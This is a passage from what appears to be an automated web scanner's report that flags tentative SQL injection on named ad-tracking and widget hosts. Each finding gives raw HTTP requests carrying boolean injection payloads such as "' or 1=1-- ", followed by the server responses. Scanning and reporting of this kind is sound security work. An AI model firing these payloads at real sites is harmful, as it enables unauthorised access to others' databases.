EVX=eJyFzjEOwyAMheG75ATvGShgDmNlZM5YcffaHaomqdTN0mfwv2vS59Teexm75pgxDmXTjaXCqgmyodDEuI2p%252FGiTUDYDxGApVC4ab0FXCU0%252FlKH%252B8%252FIIsBGewXPG%252FdB6Fz98Vf6t3ou%252Fm9Z6AY0CQKQ%253D

Response 2

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: TFF=eJyVlE0SgyAMhe%252FiCZKA8uPGY3TrwkVnumt3jncv2BY1AYsLB2XeR96DyOjJ%252BfnpkXxDoAdocXDOUdOPnvx899iHpzUQBvi9LkLfRr1ieuo%252Fn3vOJKyOCHOgj0pLX6WWa0%252B36TG%252BJra2Vb%252B1uZ0YA6OfDrKxdyUwoxch9LcQMc4krI4II4%252BdlKrgiTCfAc%252F1IgPKg9hnCFgtsTYJ2gGAcs7sljm8Rr3e9OicMsQPksQeSNIBWuGxTB498kau5bpaziSsjghzaK94im0G2Z9Y7vdRX8z%252Bhytm55xJ2OVKeDERnifCgjMsOuPE2nEAnz0gA0YVL52NVKkW5HYhT8QrEKqUyxuvl3XA; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOwzAMA%252F%252BSF5ByXNvyY4SMmTsW%252FnslBwjaJkA3AUeRt%252Bmqr11ba7lvx43%252BVFZdmAusmGA1ZJoYl74rT1olKKsBYrAUVH5o%252FIJOJWi6oQzqzcMlwEq4Br81rkNjGj88Kv%252BiV%252BNPpyiSgpJuVtMMY4Y5Fccb5iNMAg%253D%253D; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 14:58:00 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

1.14. http://map.media6degrees.com/orbserv/aopix [acs cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/aopix?pixId=1070&pcv=18&cb=3893481378&topHref=http%3A%2F%2Fwww.orbitcast.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=014020a0g0h1ljtllpxzt1hk8dxzt1hk8dxzt1tzu'%20and%201%3d1--%20; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; clid=2ljtllp01170xrd52zkwjuxh0qypp00g3e020j02502; rdrlst=40o1196lkkkbe000000013e011194lkkjj4000000023e020lw5lkb5u2000000063e0215smlkb5u2000000063e020zaalkb5u2000000063e020dlxlkb5u2000000063e0210rdlkdkly000000033e0213bolk7p6z000000093e020hsnlkb5u2000000063e020znmlk34620000000b3e021203lkb5u2000000063e02140rlkb5u2000000063e020p1blkb5u2000000063e02159olk8fax000000083e02137qlkb5u2000000063e020zr4lkb5u2000000063e020afqlkb5u2000000063e0200bvlk9pe8000000073e0215xylk60qe0000000a3e0210poljyxb40000000d3e0210telkd7nq000000053e020ni1lkb5u2000000063e020bo8lkb5u2000000063e020c9slk9pe8000000073e02; sglst=20e0s8ndlkb5u2000000063e020j02502719lkb5u2000000063e020j0250256blkb5u2000000063e020j02502ag2lkd7nq07cno0053e020j02502c80lkb5u2000000063e020j02502asulkb5u2000000063e020j02502dgilkb5u2000000063e020j025029q5lkb5u2000000063e020j025024wclkb5u2000000063e020j025020t7ljyxb40ln0a00d3e020j025025mrlkb5u2000000063e020j02502bo0lkb5u2000000063e020j02502aoplkb5u2000000063e020j02502942lkb5u2000000063e020j02502; vstcnt=417k010r044f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1ljtllpxzt1r44txzt1r44txzt1tzu; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0r44t00h3e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: rdrlst=40p15smlkb5u2000000073e030hsnlkb5u2000000073e0310rdlkdkly000000043e03159olk8fax000000093e030bo8lkb5u2000000073e031196lkkkbe000000023e020lw5lkb5u2000000073e031194lkkjj4000000033e030dlxlkb5u2000000073e030zaalkb5u2000000073e0313bolk7p6z0000000a3e030znmlk34620000000c3e031203lkb5u2000000073e03140rlkb5u2000000073e031192lkkpqi000000013e010p1blkb5u2000000073e03137qlkb5u2000000073e030zr4lkb5u2000000073e030afqlkb5u2000000073e0300bvlk9pe8000000083e0315xylk60qe0000000b3e0310poljyxb40000000e3e0310telkd7nq000000063e030ni1lkb5u2000000073e030c9slk9pe8000000083e03; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: sglst=20k0s8ndlkb5u209jwg0073e030j03503719lkb5u209jwg0063e000j0050071alkkpqi000000013e010j0150156blkb5u209jwg0073e030j03503ag2lkd7nq07i2s0063e030j03503c80lkb5u209jwg0063e000j00500c81lkkpqi000000013e010j01501a6slkkpqi000000013e010j01501asulkb5u209jwg0063e000j00500dgilkb5u209jwg0063e000j005009rslkkpqi000000013e010j015019q5lkb5u209jwg0073e030j035034wclkb5u209jwg0063e000j00500dgflkkpqi000000013e010j015010t7ljyxb40lsfe00e3e030j035038eklkkpqi000000013e010j015015mrlkb5u209jwg0073e030j03503bo0lkb5u209jwg0073e030j03503aoplkb5u209jwg0063e000j00500942lkb5u209jwg0073e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Set-Cookie: vstcnt=417k010r052te10tq10a24f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:30 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4940&nid=1994&put=xrd52zkwjuxh&expires=30
Content-Length: 0
Date: Mon, 02 May 2011 15:01:30 GMT

Request 2

GET /orbserv/aopix?pixId=1070&pcv=18&cb=3893481378&topHref=http%3A%2F%2Fwww.orbitcast.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=014020a0g0h1ljtllpxzt1hk8dxzt1hk8dxzt1tzu'%20and%201%3d2--%20; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; clid=2ljtllp01170xrd52zkwjuxh0qypp00g3e020j02502; rdrlst=40o1196lkkkbe000000013e011194lkkjj4000000023e020lw5lkb5u2000000063e0215smlkb5u2000000063e020zaalkb5u2000000063e020dlxlkb5u2000000063e0210rdlkdkly000000033e0213bolk7p6z000000093e020hsnlkb5u2000000063e020znmlk34620000000b3e021203lkb5u2000000063e02140rlkb5u2000000063e020p1blkb5u2000000063e02159olk8fax000000083e02137qlkb5u2000000063e020zr4lkb5u2000000063e020afqlkb5u2000000063e0200bvlk9pe8000000073e0215xylk60qe0000000a3e0210poljyxb40000000d3e0210telkd7nq000000053e020ni1lkb5u2000000063e020bo8lkb5u2000000063e020c9slk9pe8000000073e02; sglst=20e0s8ndlkb5u2000000063e020j02502719lkb5u2000000063e020j0250256blkb5u2000000063e020j02502ag2lkd7nq07cno0053e020j02502c80lkb5u2000000063e020j02502asulkb5u2000000063e020j02502dgilkb5u2000000063e020j025029q5lkb5u2000000063e020j025024wclkb5u2000000063e020j025020t7ljyxb40ln0a00d3e020j025025mrlkb5u2000000063e020j02502bo0lkb5u2000000063e020j02502aoplkb5u2000000063e020j02502942lkb5u2000000063e020j02502; vstcnt=417k010r044f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0r44u00h3e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Set-Cookie: rdrlst=40p15smlkb5u2000000073e030hsnlkb5u2000000073e0310rdlkdkly000000043e03159olk8fax000000093e030bo8lkb5u2000000073e031196lkkkbe000000023e020lw5lkb5u2000000073e031194lkkjj4000000033e030dlxlkb5u2000000073e030zaalkb5u2000000073e0313bolk7p6z0000000a3e030znmlk34620000000c3e031203lkb5u2000000073e03140rlkb5u2000000073e031192lkkpqj000000013e010p1blkb5u2000000073e03137qlkb5u2000000073e030zr4lkb5u2000000073e030afqlkb5u2000000073e0300bvlk9pe8000000083e0315xylk60qe0000000b3e0310poljyxb40000000e3e0310telkd7nq000000063e030ni1lkb5u2000000073e030c9slk9pe8000000083e03; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Set-Cookie: sglst=20e0s8ndlkb5u2000000073e030j03503719lkb5u2000000073e030j0350356blkb5u2000000073e030j03503ag2lkd7nq07i2t0063e030j03503c80lkb5u2000000073e030j03503asulkb5u2000000073e030j03503dgilkb5u2000000073e030j035039q5lkb5u2000000073e030j035034wclkb5u2000000073e030j035030t7ljyxb40lsff00e3e030j035035mrlkb5u2000000073e030j03503bo0lkb5u2000000073e030j03503aoplkb5u2000000073e030j03503942lkb5u2000000073e030j03503; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Set-Cookie: vstcnt=417k010r052te10tq10a24f7qr118e10824uzg6118e10024fgv9118e10824eflo118e1042; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 15:01:31 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4940&nid=1994&put=xrd52zkwjuxh&expires=30
Content-Length: 0
Date: Mon, 02 May 2011 15:01:31 GMT
Connection: close


1.15. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14286747'%20or%201%3d1--%20 and 14286747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets14286747'%20or%201%3d1--%20/multiwidget3/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:45:47 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets14286747' or 1=1-- /multiwidget3/TA/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets14286747'%20or%201%3d2--%20/multiwidget3/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02577
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:45:48 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets14286747' or 1=2-- /multiwidget3/TA/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['ho
...[SNIP]...

1.16. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20680832'%20or%201%3d1--%20 and 20680832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget320680832'%20or%201%3d1--%20/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:10 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget320680832' or 1=1-- /TA/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget320680832'%20or%201%3d2--%20/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:10 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget320680832' or 1=2-- /TA/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['home_loans', [], []],
...[SNIP]...

1.17. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 99172217'%20or%201%3d1--%20 and 99172217'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/TA99172217'%20or%201%3d1--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:27 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/TA99172217' or 1=1-- /FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/TA99172217'%20or%201%3d2--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.03963
ETag: "5b4aa92de6e82aba561068d98e1e5f96"
Status: 200 OK
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate, max-age=0
Date: Mon, 02 May 2011 12:46:27 GMT
Connection: close
Content-Length: 98246

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:righ
...[SNIP]...

1.18. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19292364'%20or%201%3d1--%20 and 19292364'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d1--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:56 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS19292364' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d2--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 500
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:56 GMT
Connection: close
Content-Length: 75448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<script type="text/javascript">
if (((document.domain.indexOf("smh.com.au") != -1) || (document.domain.indexOf("theage.com.au") != -1) ||
(document.domain.indexOf("watoday.com.au") != -1) ||
(document.domain.indexOf("brisbanetimes.com.au") != -1) ||
(document.domain.indexOf("businessday.com.au") != -1)) && (isSmartPhone()) &&
(document.cookie.indexOf("iphone_redirect=false") == -1)) {
var currentLocation = document.location.href;
if (currentLocation.indexOf("www.") != -1) {
currentLocation = currentLocation.replace("www.", "m.");
window.location = currentLocation;
}
}

/**
* Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone.
*
* @return True if the user agent represents a smart phone; otherwise false.
*/
function isSmartPhone() {
var userAgent = navigator.userAgent
return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) &&
(!matchesTabletUserAgentRegularExpressions(userAgent)));
}

/**
* Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone.
* If any of the regular expressions are updated then they should be updated in
* <code>SmartPhoneHelper.java</code>.

...[SNIP]...

1.19. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31488663%20or%201%3d1--%20 and 31488663%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d1--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
